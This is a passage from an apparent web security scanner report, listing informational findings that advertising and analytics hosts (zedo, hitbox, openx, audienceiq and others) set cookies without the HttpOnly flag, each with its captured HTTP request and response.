Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMTQ3MjgxNDcyMC4zMDE3OTY4MAAAAAAAAAACAAAAPXQAAKwDiU6Z/IhO/ucAAIX9iE6D/YhOAQAAABQuAACsA4lOmfyITgAAAAA-; logging=E880BFD3C49D42E3||egapp2218p.prod.orbitz.net; MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMjUzMjI3fEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzc6MzMgUE18IHwg; mbox=check#true#1317602329|session#1317602268649-666039#1317604129; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598702061:ss=1317598702061

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:40:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMTQ3MjgxNDcyMC4zMDE3OTY4MAAAAAAAAAADAAAAPXQAAAQEiU6Z/IhO/ucAAAUEiU6D/YhO+XEAAGsEiU4ABIlOAQAAABQuAABrBIlOmfyITgAAAAA-; path=/; expires=Thu, 30-Sep-2021 00:40:11 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

14.130. http://d.agkn.com/iframe!t=1168!

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.agkn.com
Path:   /iframe!t=1168!

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: uuid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe!t=1168!?che=823146&e=x&ent=5797640,69802575,246279115,44069375 HTTP/1.1
Host: d.agkn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sat, 01-Oct-2016 00:09:56 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 239
Date: Mon, 03 Oct 2011 00:09:56 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="pragma" content="no-cache">

</head>

<body style="border: 0; margin:
...[SNIP]...

14.131. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: uid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2966958661410417168

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2966958661410417168; Domain=.audienceiq.com; Expires=Sat, 31-Mar-2012 00:09:11 GMT; Path=/
Content-Type: text/javascript
Content-Length: 0
Date: Mon, 03 Oct 2011 00:09:11 GMT

14.132. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: uid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/ HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26620&s=26621
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2966958661410417168

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2966958661410417168; Domain=.audienceiq.com; Expires=Sat, 31-Mar-2012 01:52:56 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 03 Oct 2011 01:52:55 GMT

GIF89a.............!.......,...........D..;

14.133. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2944787775510337379/mchpid/9/url/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/2944787775510337379/mchpid/9/url/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: uid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/2944787775510337379/mchpid/9/url/ HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4018048898892878422

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4018048898892878422; Domain=.p-td.com; Expires=Fri, 30-Mar-2012 23:49:15 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 02 Oct 2011 23:49:14 GMT

GIF89a.............!.......,...........D..;

14.134. http://d.tradex.openx.com/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: OAID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0; expires=Mon, 01-Oct-2012 23:50:29 GMT; path=/
Content-Length: 2921
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

14.135. http://d.tradex.openx.com/lg.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: OAID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lg.php?bannerid=1929&campaignid=632&zoneid=6511&cb=010de37691&r_id=c16f6660367c98569a9b97a0130e4390&r_ts=lsgq82 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0; expires=Mon, 01-Oct-2012 23:50:27 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.136. http://d.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: 1780853-B1781017. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=179638&_t=cmcont&ssv_ptnr=pm HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; 66281-B66290=3|0|0|0|0|66286|110253|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 03 Oct 2011 00:12:54 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 1780853-B1781017=3|1781033|0|0|0|1781015|22810441|-1; domain=.ru4.com; path=/
Content-type: text/html
Content-length: 1295
X-Cnection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent">
<script type="text
...[SNIP]...

14.137. http://d7.zedo.com/img/bh.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: ZFFAbh, ZFFBbh. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=0&s=1&l=1&t=e&f=1&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,5#0,24:0,6#0,24:0,6#0,24; PI=h484782Za669089Zc826000187,826000187Zs173Zt1260Zm68Zb43199; FFgeo=5386156; ZEDOIDX=29; FFAbh=977B809,20|40_1#391:305,20|149_1#365:162,20|636_1#381; FFBbh=1003B809,20|40_1#10:162,20|636_1#16:305,20|149_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: ZFFAbh=977B826,20|121_977#365;expires=Sun, 01 Jan 2012 00:15:53 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=1006B826,20|121_977#0;expires=Tue, 02 Oct 2012 00:15:53 GMT;domain=.zedo.com;path=/;
ETag: "3a9d027-de66-4add1b75df1c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=9372
Expires: Mon, 03 Oct 2011 02:52:05 GMT
Date: Mon, 03 Oct 2011 00:15:53 GMT
Connection: close

GIF89a.............!.......,...........D..;

14.138. http://data.cmcore.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cmcore.com
Path:   /imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: 90010394_reset. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp?tid=17&ci=90010394&vn1=4.1.1&vn2=e4.0&ec=UTF-8&cm_mmc=Cons-CC-_-20112H-_-AllCRConcept-_-AllCreativeSize&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=50021315153052143970353; TestSess3=x

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:54 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90010394_reset=1317600594;path=/
Expires: Sun, 02 Oct 2011 06:09:54 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

14.139. http://delivery.hotels.com/Hotels/Delivery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://delivery.hotels.com
Path:   /Hotels/Delivery.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: UID, hl_upm. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotels/Delivery.aspx?LAN=en_US&P=HOTELS_RESULTS&D=BOS&CI=10%2f04%2f2011&CO=10%2f07%2f2011&pr=1&pa0=2&CUR=USD&RID=F26233EF-31CE-4292-B85B-D59136E17861&HsrchId=8a1f660d-3224-44b2-81e5-6c5cf059520f&ads=3&HTID1=279478&HP1=289.00&HTID2=507871&HP2=385.67%7c308.53&HTID3=382704&HP3=432.33&HTID4=278318&HP4=425.67%7c383.10&HTID5=282295&HP5=429.00&HTID6=280489&HP6=409.40&HTID7=280555&HP7=412.33&HTID8=281066&HP8=401.33&HTID9=286928&HP9=399.00&HTID10=286520&HP10=379.95&HTID11=279419&HP11=349.00&HTID12=278651&HP12=345.67&HTID13=341115&HP13=399.00%7c359.10&HTID14=293264&HP14=414.00&HTID15=290317&HP15=399.00%7c339.15&HTID16=294968&HP16=419.00&HTID17=282971&HP17=127.99&HTID18=278530&HP18=359.00&HTID19=278584&HP19=445.67&HTID20=469918&HP20=445.67&HTID21=296221&HP21=399.00&HTID22=287041&HP22=436.33&HTID23=387950&HP23=392.33&HTID24=289629&HP24=221.10&HTID25=279089&HP25=263.33&HTID26=284205&HP26=335.67&HTID27=279064&HP27=295.67&HTID28=293346&HP28=309.00&HTID29=534622&HP29=875.00&HTID30=286858&HP30=439.00&HTID31=392615&HP31=124.99&HTID32=290613&HP32=143.99&HTID33=327172&HP33=103.00%7c72.10&HTID34=279428&HP34=149.22%7c141.76&HTID35=278489&HP35=223.74%7c178.99&HTID36=292088&HP36=126.66&HTID37=362369&HP37=229.95&HTID38=283739&HP38=106.66&HTID39=281930&HP39=159.00&HTID40=392054&HP40=129.99&HTID41=279446&HP41=439.00&HTID42=280626&HP42=179.00&HTID43=291348&HP43=129.99&HTID44=299565&HP44=175.67&HTID45=302276&HP45=549.00&HTID46=362518&HP46=230.00&HTID47=287689&HP47=124.99&HTID48=345803&HP48=106.66&HTID49=562856&HP49=103.00&HTID50=287601&HP50=99.99 HTTP/1.1
Host: delivery.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: UID=1961757583|1|0; expires=Tue, 02-Oct-2012 00:10:12 GMT; path=/
Set-Cookie: hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDdsY4KBK1Ss8UP/OJVjMn5RXwMzdzUolZoFNbG0LY/3mcZcj1YGkhYg9cf+1x7zjDp93dVTciqsDvIIF2mmYFd1RbFocYxB9o//yaseYy3OsV0S8C79JNlCVbfn5N53QGPKIW9FCknA/oIYfb3tgn5TXtpCoHoL5Zu2ExEwcU/MA/DwgQacyCqbkHdE577MIjt2DKh7MxWUmkvXndCU208bGgFm4Qs6PiVmjW45gH5UX/uhZ4lXzi0tTLmv38iaf58; expires=Thu, 02-Oct-2014 00:10:12 GMT; path=/
X-Powered-By: ASP.NET
p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE"
Date: Mon, 03 Oct 2011 00:10:12 GMT
Connection: close

var th_InsType1=0;var th_InsType2=0;var th_InsType3=0;var th_InsType4=0;var th_InsType5=0;var th_InsType6=0;var th_InsertStart=new Date();var th_instanceArray=new Array();var THSearch = 3861123723;var
...[SNIP]...

14.140. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=990892811131760&transactionID=642711317600486&random=908927341317600

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=990892811131760&transactionID=642711317600486&random=908927341317600

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NGUserID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=990892811131760&transactionID=642711317600486&random=908927341317600 HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:04 GMT
Server: Apache
X-Server: prdlmn0408
Set-Cookie: NGUserID=a1c4b0d-32323-499133968-1317600484; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:04 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1150
Content-Type: application/x-javascript

document.write('<a href=\"http://dm.travelocity.com/event.ng/Type=click&FlightID=131412&AdID=180775&TargetID=28645&ASeg=&AMod=&AOpt=0&Segments=1,9,24,3090,4384,5796,5848,9520,10495,11148,12670,20052,2
...[SNIP]...

14.141. http://ehg-twi.hitbox.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-twi.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: WSS_GW, DM55040895RDV6, CTG, DM5708060ANBV6. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM55040895RD95EN3%3BDM5708060ANB71EN3&hec=1&vjs=HBX0201.03u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-twi.hitbox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.mufoundation.org/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%X%@Q^^XCC; DM55040895RDV6=V1^Q(#X"rz%X%@Q^^XCCr@rQXCz%zrzCXi"%X%@Q^^XCCz%X%@Q^^XCC"%X%@Q^^@iB"%X%@Q^^XCCr@rQXC"%eBz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)O:ma6r"OuKr6%XzA6DTdT:kTHGIWaoF9; DM570806C8RAV6=V1@%(#X"rz%X%@Q^^XCCr@rQXCz%zrzCXi"%X%@Q^^XCCz%X%@Q^^XCC"%X%@Q^^@iB"%X%@Q^^XCCr@rQXC"%eBz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; CTG=1317599782

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:28 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: WSS_GW=V1z%X%@Q^^XCC; path=/; domain=.hitbox.com; expires=Mon, 01-Oct-2012 23:58:28 GMT; max-age=31536000
Set-Cookie: DM55040895RDV6=V1^Q(#X"rz%X%@Q^^XCCr@rQXCz%zrzQeC"%X%@Q^^XCCz%X%@Q^^XCC"%X%@Q^^^ri"%X%@Q^^XCCr@rQXC"%Bez(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)O:ma6r"OuKr6%XzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:58:28 GMT; max-age=31536000
Set-Cookie: CTG=1317599908; path=/; domain=.hitbox.com; expires=Sun, 09-Oct-2011 23:58:28 GMT; max-age=604800
Set-Cookie: DM5708060ANBV6=V1@%(#X"rz%X%@Q^^^rir^rXQQz%zrzr"%X%@Q^^^riz%X%@Q^^^ri"%X%@Q^^^ri"%X%@Q^^^rir^rXQQ"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%%rzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:58:28 GMT; max-age=31536000
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Sun, 02 Oct 2011 23:58:29 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.142. http://ehg-twi.hitbox.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-twi.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM55040895RD95EN3%3BDM570806C8RA71EN3&hec=1&vjs=HBX0201.03u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-twi.hitbox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/Splash-Page.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%X%@C@C%Xi; CTG=1317474165

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:05 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
